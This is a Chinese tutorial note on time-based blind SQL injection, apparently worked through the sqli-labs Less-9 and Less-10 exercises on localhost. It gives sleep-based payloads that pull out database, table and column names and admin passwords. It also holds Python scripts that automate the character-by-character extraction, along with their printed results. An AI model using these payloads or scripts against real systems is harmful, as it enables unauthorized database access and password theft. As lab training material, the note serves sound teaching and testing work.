4.延时盲注
延时盲注原理
无法利用页面显示结果判断SQL注入是否执行成功,此时可以利用SQL语句执行的延时判断SQL是否执行成
功
只要可以执行延时,那么就可以利用该注入技术
sqL时间类型的盲注本质是利用插入的SQL语句执行成时间延迟,插入的SQL语句中包含延时执行的语句,当数据
库执行该语句时,会延时执行。
Mysql中常用的延时执行函数
sleep(num)
benchmark(num,function) benchmark(100000000,rand())
Mysql中常用的判断结构
IF(condition,when_true,when_flase)
例如:
select * from admin where id = 1 and (if(length(database())>0,sleep(3),))
延时盲注实验
延时注入也是基于逐个字节猜解的技术
-
获得数据库名称长度
id=1' and if(length(database())=7,sleep(3),null)--+
-
获取数据库名称
id=1' and if(substr(database(),1,1)='s',sleep(3),null)--+
-
查看数据表名
id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a',sleep(3),null)--+
-
查看字段名
id=1' and if(substr((select column_name from information_schema.columns where table_name='admin' limit 0,1),1,1)='u',sleep(3),null)--+
-
数据内容
id=1' and if(substr((select password from admin limit 0,1),1,1)='f',sleep(3),null)--+
-
尝试用burpsuite注入
SQL-LIAB
less-9
-
判断注入方式
1'and sleep(3)--+
-
python自动化注入:
import requests chars= "0123456789-qwertyuiopasdfghjklzxcvbnm}{" flag="" # # 获得数据库名 # payload="1' and if(substr(database(),"+str(i)+",1)='"+char+"',sleep(3),null)--+" for i in range(1,10): for char in chars: url="http://localhost/Less-9/?id=" payload="1' and if(substr(database(),"+str(i)+",1)='"+char+"',sleep(3),null)--+" url=url+payload # print(url) try: response=requests.get(url=url,timeout=3) except requests.exceptions.ReadTimeout as e: flag=flag+char if len(flag) != 0: print("database_name:"+flag) # # 获得数据库表名 # # payload="1' and if(substr((select table_name from information_schema.tables where table_schema=database limit "+str(x)+",1),"+str(i)+",1)='"+char+"',sleep(3),null)--+" for x in range(0,5): flag= "" for i in range(1, 10): for char in chars: url = "http://localhost/Less-9/?id=" payload="1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1),"+str(i)+",1)='"+char+"',sleep(3),null)--+" url = url + payload # print(url) try: response = requests.get(url=url, timeout=3) except requests.exceptions.ReadTimeout as e: flag = flag + char print("table_name:"+flag) # # 获取admin表中的字段名 # # payload="1' and if(substr((select column_name from information_schema.columns where table_schema='admin' limit "+str(x)+",1),"+str(i)+",1)='"+char+"',sleep(3),null)--+" for x in range(0,5): flag= "" for i in range(1, 10): for char in chars: url = "http://localhost/Less-9/?id=" payload="1' and if(substr((select column_name from information_schema.columns where table_name='admin' limit "+str(x)+",1),"+str(i)+",1)='"+char+"',sleep(3),null)--+" url = url + payload # print(url) try: response = requests.get(url=url, timeout=3) except requests.exceptions.ReadTimeout as e: flag = flag + char if len(flag)!=0: print("column_name:"+flag) # 获取内容 # payload=payload="1' and if(substr((select password from admin limit "+str(x)+",1),"+str(i)+",1)='"+char+"',sleep(3),null)--+" for x in range(0,5): for item in ['id','username','password']: flag = "" for i in range(1, 50): for char in chars: url = "http://localhost/Less-9/?id=" payload = "1' and if(substr((select "+item+" from admin limit " + str(x) + ",1)," + str( i) + ",1)='" + char + "',sleep(3),null)--+" url = url + payload # print(url) try: response = requests.get(url=url, timeout=3) except requests.exceptions.ReadTimeout as e: flag = flag + char if len(flag) != 0: print(item+":" + flag)
显示内容为: database_name:security table_name:admin table_name:emails table_name:referers table_name:uagents table_name:users column_name:username column_name:password id:1 username:admin password:flag{echjsalfajsfkjasgda}
-
代码审计
Less-10
-
判断注入方式
1" and sleep()
- 闭合双引号
- 延时注入
-
python自动注入编写
import requests chars="0123456789qwertyuiopasdfghjklzxcvm}{" # 获取table # payload='1" and if(ord(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=97,sleep(3),1)--+' for x in range(0, 5): table_name="" for y in range(1, 20): for char in chars: url = 'http://localhost/Less-10/?id=' payload='1" and if(ord(mid((select table_name from information_schema.tables where table_schema=database() limit '+str(x)+',1),'+str(y)+',1))='+str(ord(char))+',sleep(3),1)--+' url = url+payload # print(url) try: r = requests.get(url=url,timeout=3) # print(r.url) except requests.exceptions.ReadTimeout as e: table_name = table_name + char if len(table_name) != 0: print("table_name:"+table_name) # 获取字符串 # payload='1" and if(ord(mid((select column_name from information_schema.columns where table_name=0x61646D696E limit 0,1),1,1))=97,sleep(3),1)--+' for x in range(0, 10): column_name = "" for y in range(1,20): for char in chars: url='http://localhost/Less-10/?id=' payload = '1" and if(ord(mid((select column_name from information_schema.columns where table_name=0x61646D696E limit '+str(x)+',1),'+str(y)+',1))='+str(ord(char))+',sleep(3),1)--+' url=url+payload try: r=requests.get(url=url,timeout=3) except requests.exceptions.ReadTimeout as e: column_name +=char if bool(column_name): print("column_name:"+column_name) # 获取字段内容 # payload='1" and if(ord(mid((select password from admin limit 0,1),1,1))=97,sleep(3),1)--+' for x in range(0,10): password_value= "" for y in range(0,20): for char in chars: url='http://localhost/Less-10/?id=' payload = '1" and if(ord(mid((select password from admin limit '+str(x)+',1),'+str(y)+',1))='+str(ord(char))+',sleep(3),1)--+' url=url+payload try: r=requests.get(url,timeout=3) except requests.exceptions.ReadTimeout as e: password_value += char if len(password_value)!=0: print("password_value:"+password_value)
显示: table_name:admi table_name:emails table_name:referers table_name:uagets table_name:users column_name:userame column_name:password password_value:flag{echjsalfajsfkj
-
代码审计